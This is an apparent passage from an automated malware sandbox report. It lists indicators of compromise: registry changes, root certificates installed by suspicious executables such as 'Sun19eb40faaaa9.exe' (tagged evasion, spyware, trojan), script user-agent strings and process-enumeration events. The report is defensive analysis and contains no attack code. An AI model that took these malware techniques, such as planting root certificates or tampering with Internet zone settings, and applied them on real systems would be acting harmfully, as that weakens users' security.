Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.FileSyncClient.1\CLSID\ = "{7B37E4E2-C62F-4914-9620-8FB5062718CC}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusToastActivator.NucleusToastActivator.1\CLSID\ = "{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ = "IAlbumMetadataCallback"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LOCALSERVER32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ = "IFileSyncClient"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ThreadingModel = "Apartment"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\amd64\\FileCoAuthLib64.dll"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\INPROCSERVER32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\mssharepointclient\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\Microsoft.SharePoint.exe\" /protocol:\"%1\""	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{9D613F8A-B30E-4938-8490-CB5677701EBF}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{A87958FF-B414-7748-9183-DBF183A25905}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\BannerNotificationHandler.BannerNotificationHandler\ = "BannerNotificationHandler Class"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\FLAGS	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\HELPDIR	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\INPROCSERVER32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{78FCB96D-637B-4FCC-AED3-9E5B06D6139E}"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ProgID	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\7289246C77593EBF	svchost.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\CLSID\ = "{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{0D4E4444-CB20-4C2B-B8B2-94E5656ECAE8}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\\1"	OneDriveSetup.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun19eb40faaaa9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun19eb40faaaa9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	82	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	192	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
4360	Sun1908b94df837b3158.exe
4360	Sun1908b94df837b3158.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
3792	rundll32.exe
3792	rundll32.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2608	svchost.exe
2608	svchost.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
4312	powershell.exe
4312	powershell.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
3772	WerFault.exe
3772	WerFault.exe
3772	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2252	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4360	Sun1908b94df837b3158.exe
6096	Process not Found
6096	Process not Found
6892	MicrosoftEdgeCP.exe
6892	MicrosoftEdgeCP.exe
